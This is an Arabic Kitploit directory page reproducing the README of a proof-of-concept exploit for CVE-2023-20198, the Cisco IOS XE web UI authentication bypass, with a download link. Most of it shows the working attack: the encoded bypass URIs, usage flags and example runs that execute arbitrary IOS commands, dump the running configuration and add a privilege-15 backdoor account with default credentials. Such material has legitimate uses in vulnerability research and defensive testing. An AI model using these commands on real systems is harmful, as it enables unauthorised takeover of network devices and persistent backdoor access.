Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20198 — CVE-2023-20198 Exploit PoC | Kitploit
أدوات/GitHubGitHub/smokeintheshell/cve-2023-20198
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlAuthentication
GitHubsmokeintheshell/cve-2023-20198

CVE-2023-20198

CVE-2023-20198 Exploit PoC

عرض المستودع
6619منذ 4 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-20198

إثبات المفهوم (PoC) لـ CVE-2023-20198

الوصف

تتميز CVE-2023-20198 بتحقق غير صحيح من المسار لتجاوز فلترة Nginx للوصول إلى نقطة النهاية الويب webui_wsma_http دون الحاجة إلى المصادقة.
من خلال تجاوز المصادقة على نقطة النهاية، يمكن للمهاجم تنفيذ أوامر Cisco IOS عشوائية أو إجراء تغييرات في التكوين بامتيازات Privilege 15.
كشف تحقيق Cisco حول الاستغلال النشط للثغرة غير المعلنة سابقًا أن المهاجمين استغلوا أولاً CVE-2023-20198 لإضافة مستخدم جديد بمستوى امتياز 15. تضمنت الهجمات اللاحقة استغلال CVE-2023-20273 للتصعيد إلى مستخدم root في نظام Linux الأساسي لتسهيل الزرع.

يستغل هذا الإثبات (PoC) CVE-2023-20198 للاستفادة من نقطتي نهاية مختلفتين لـ XML SOAP:
تستهدف خيارات فحص الثغرة والتكوين وتنفيذ الأوامر جميعها نقطة نهاية SOAP cisco:wsma-exec لإدراج الأوامر في عنصر execCLI.
يستهدف خيار إضافة المستخدم نقطة نهاية SOAP cisco:wsma-config لإصدار تغيير في التكوين وإضافة حساب Privilege 15. يمكن إساءة استخدام هذه النقطة لإجراء تغييرات أخرى في التكوين، لكن ذلك خارج نطاق هذا الإثبات.

جاء إساءة استخدام نقطة نهاية SOAP cisco:wsma-exec من قالب nuclei
جاء إساءة استخدام نقطة نهاية SOAP cisco:wsma-config من إثبات horizon3ai

ملاحظة: لم أقم بأي من البحث الأصلي أو تطوير الإثبات لهذه CVE. راجع قسم المراجع للإسناد.

الاستخدام

root@kitploit:~
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help          show this help message and exit
  -t targetIP         Target IP Address
  -l targetFile       File containing IP Addresses (-c only)
  -https              Use https
  -uri vulnerableURI  The URI that is vulnerable to exploit. The most common are "%2577eb%2575i_%2577sma_Http", "%2577eb%2575i_%2577sma_https", and "%2577ebui_wsma_https". You may need to play around with these along with -https to get a true positive result
  -c                  [X] Check for vulnerability
  -g                  [X] Get Cisco IOS running config
  -e command          [X] Execute Cisco IOS command
  -a                  [X] Add new priv 15 user
  -d                  [X] Remove priv 15 user
  -u newUserName      [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass      [Optional] new user pass for -a. Default: pwned
  -o outputFile       Write output to file
  -v                  Increase verbosity

فحص الثغرة

لفحص CVE-2023-20198، سيحاول -c استغلال الثغرة لتنفيذ uname -a
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

الحصول على تكوين Cisco

يقوم الخيار -g بتنفيذ sh run لسحب التكوين الجاري
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

تنفيذ الأوامر

يمكن تنفيذ أوامر Cisco IOS عشوائية باستخدام الخيار -e.
يجب توخي الحذر الشديد عند استخدام هذا لإجراء تغييرات في التكوين. لا يوجد التحقق من صحة الإدخال ويتم تطبيق التغييرات فورًا على التكوين الجاري.
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

إضافة مستخدم

يمكن استخدام الخيار -a لإنشاء حساب مستخدم جديد بامتياز Privilege 15، مع إمكانية تحديد اسم الحساب وكلمة المرور اختياريًا باستخدام -u و -p على التوالي.
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

حذف مستخدم

يمكن استخدام الخيار -d لإزالة حساب مستخدم من الجهاز، ويحترم اسم المستخدم المحدد باستخدام -u.
يجب توخي الحذر للتأكد من عدم حذف حساب شرعي.
تمت إضافة هذا للحالات التي لا يمكن فيها الحصول على وصول شل/واجهة ويب إلى جهاز Cisco المُستغل. لوحظ أن إضافة مستخدم Privilege 15 لا يمنح وصولاً إلى واجهة الويب وقد يؤدي إلى ترك آثار استغلال على المضيفين.

المراجع

إعلان Cisco
بحث horizon3ai حول CVE-2023-20198
إثبات horizon3ai لـ CVE-2023-20198
قالب nuclei لـ CVE-2023-20198 (المؤلفون: iamnoooob, rootxharsh, pdresearch)
إثبات LeakIX لـ CVE-2023-20273

المهام المتبقية

  • دعم HTTPS
  • تنفيذ CVE-2023-20273
  • معالجة المهلة والأخطاء

إخلاء مسؤولية

الكود الموجود في هذا المشروع مخصص فقط للبحث والاستخدام على الأنظمة التي يملك المستخدم إذنًا صريحًا لها.
مؤلف هذا المشروع ليس مسؤولاً أو غير مسؤول عن سوء استخدام البرنامج.
استخدم بمسؤولية ولا تكن شريرًا.

تنزيل الأداة